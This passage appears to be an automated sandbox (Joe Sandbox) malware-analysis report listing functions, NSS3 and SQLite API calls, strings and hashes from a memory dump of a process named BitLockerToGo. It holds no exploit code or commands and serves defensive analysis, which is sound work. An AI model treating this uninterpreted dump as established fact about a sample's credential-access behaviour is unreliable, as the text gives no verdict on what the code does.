                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1be790091253a97d5cf3918bff4cd1c0d945195509d99d08573be10b472a8020
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d7ce82f0138b14edb28c91a124e5af43c1ec5c4b0b88c27273069d86fdf69d9d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be790091253a97d5cf3918bff4cd1c0d945195509d99d08573be10b472a8020
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC1B2B19012199BDB20CF24CC84BDAB7F4BF49308F1441A9E849A7741E775EE95CFA8
                                                                                                                                                                                                                                                                                                                                                          Function 6C67DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C6897C1,?,00000000,00000000,?,?,?,00000000,?,6C667F4A,00000000), ref: 6C67DC68
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DD36
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DE2D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DE43
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DE76
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DF32
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DF5F
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DF78
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DFAA
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1886645929-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: da92134fdc762f19a6acc16fe1830e6379bd163caa74643fb603a7b3e1db21c2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE81B5716066018BFB368A59CC903A972D6DB61348F208C3AD51ACAFD1D779D8C6C63E
                                                                                                                                                                                                                                                                                                                                                          Function 6C653C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C653C76
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C653C94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: TlsGetValue.KERNEL32(00000000,?,6C6600D2,00000000), ref: 6C6495D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: EnterCriticalSection.KERNEL32(?,?,?,6C6600D2,00000000), ref: 6C6495E7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: PR_Unlock.NSS3(?,?,?,?,6C6600D2,00000000), ref: 6C649605
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C653CB2
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C653CCA
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C653CE1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C66AE42), ref: 6C6530AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6530C7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6530E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C653116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C65312B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PK11_DestroyObject.NSS3(?,?), ref: 6C653154
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65317E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3167935723-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0b9a092f3cf36a42bad098fa07b5164538f61eb212c488d335f2ac316149291d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b402d0e63bc6abdb8f3a1fc85fa014dc059e9da2197552268b44f8e5c8d9a784
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b9a092f3cf36a42bad098fa07b5164538f61eb212c488d335f2ac316149291d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E6107B1B00200ABEB105F65DC41FA776F9EF09B48F584039FD459AA52F721D825C7B9
                                                                                                                                                                                                                                                                                                                                                          Function 6C693D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C693440: PK11_GetAllTokens.NSS3 ref: 6C693481
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C693440: PR_SetError.NSS3(00000000,00000000), ref: 6C6934A3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C693440: TlsGetValue.KERNEL32 ref: 6C69352E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C693440: EnterCriticalSection.KERNEL32(?), ref: 6C693542
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C693440: PR_Unlock.NSS3(?), ref: 6C69355B
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C693D8B
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C693D9F
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C693DCA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C693DE2
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C693E4F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C693E97
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C693EAB
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C693ED6
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C693EEE
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2554137219-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 472ae9ae2bda9402d57de9256294a4d401ad47d7ee97036c5bdb10a45389fcb0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 01ae1809f63f565f08541cc2356294a130bb21dbf3eaae2dc7b5eac35e4870e3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 472ae9ae2bda9402d57de9256294a4d401ad47d7ee97036c5bdb10a45389fcb0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E515971A002029FDB019F69DC44BAA77B4EF46318F04017ADE0D87B21EB31E955C7DA
                                                                                                                                                                                                                                                                                                                                                          Function 6C642C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(BD5F5530), ref: 6C642C5D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0D30: calloc.MOZGLUE ref: 6C6A0D50
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0D30: TlsGetValue.KERNEL32 ref: 6C6A0D6D
                                                                                                                                                                                                                                                                                                                                                          • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C642C8D
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C642CE0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C642CDA,?,00000000), ref: 6C642E1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C642E33
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: TlsGetValue.KERNEL32 ref: 6C642E4E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: EnterCriticalSection.KERNEL32(?), ref: 6C642E5E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: PL_HashTableLookup.NSS3(?), ref: 6C642E71
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: PL_HashTableRemove.NSS3(?), ref: 6C642E84
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C642E96
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642E00: PR_Unlock.NSS3 ref: 6C642EA9
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C642D23
                                                                                                                                                                                                                                                                                                                                                          • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C642D30
                                                                                                                                                                                                                                                                                                                                                          • CERT_MakeCANickname.NSS3(00000001), ref: 6C642D3F
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C642D73
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C642DB8
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE ref: 6C642DC8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C643E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C643EC2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C643E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C643ED6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C643E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C643EEE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C643E60: PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C643F02
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C643E60: PL_FreeArenaPool.NSS3 ref: 6C643F14
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C643E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C643F27
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4262d891229c22960c23bc0b762f421707bab2ab75d2be4f4fe95b2bed9abae0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 11c8f15b3677f67ea7d126231057453019f85e82e73025bcff258eda6c9584f9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4262d891229c22960c23bc0b762f421707bab2ab75d2be4f4fe95b2bed9abae0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1451DE71A042119BEB01DE29DC89B5B77E5EF89348F25C438EC59C3650EB31E8158B9A
                                                                                                                                                                                                                                                                                                                                                          Function 6C647CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6440D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C643F7F,?,00000055,?,?,6C641666,?,?), ref: 6C6440D9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6440D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C641666,?,?), ref: 6C6440FC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6440D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C641666,?,?), ref: 6C644138
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C647CFD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C769030), ref: 6C647D1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C641A3E,00000048,00000054), ref: 6C69FD56
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C769048), ref: 6C647D2F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C647D50
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C647D61
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C647D7D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C647D9C
                                                                                                                                                                                                                                                                                                                                                          • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C647DB8
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C647E19
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 70581797-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b4258f2482a253b3fae160bef4c28706bad6df73513a43aae58b544e11e05701
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d9def0719429a73b741e4a789ab3cafa702df4567acc7c946fbd94c8d3d4f205
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4258f2482a253b3fae160bef4c28706bad6df73513a43aae58b544e11e05701
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F841F172A1011A9BEB009F699C41BAF37E4AF5135CF058034EC19ABB51E730E919C7E9
                                                                                                                                                                                                                                                                                                                                                          Function 6C5DE890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C5DE922
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5DE9CF
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5DEA0F
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5DEB20
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C5DEB57
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C5DEDC2
                                                                                                                                                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 6C5DEE04
                                                                                                                                                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 6C5DED18
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpystrlen$memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 638109778-272990098
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1596229d884ab134b7d8bdc5731b5db324d92c921f6abb576bdcdb452fdfa791
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fb57c8297d6fb25462a02da28ee83fa68af43c1d9afd7153f1bf270bec54b247
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1596229d884ab134b7d8bdc5731b5db324d92c921f6abb576bdcdb452fdfa791
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C026D71A01209CFDB04CF5DC880AAEF7B2FF89318F1A85A9D815AB751D771B941CBA4
                                                                                                                                                                                                                                                                                                                                                          Function 6C5E7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
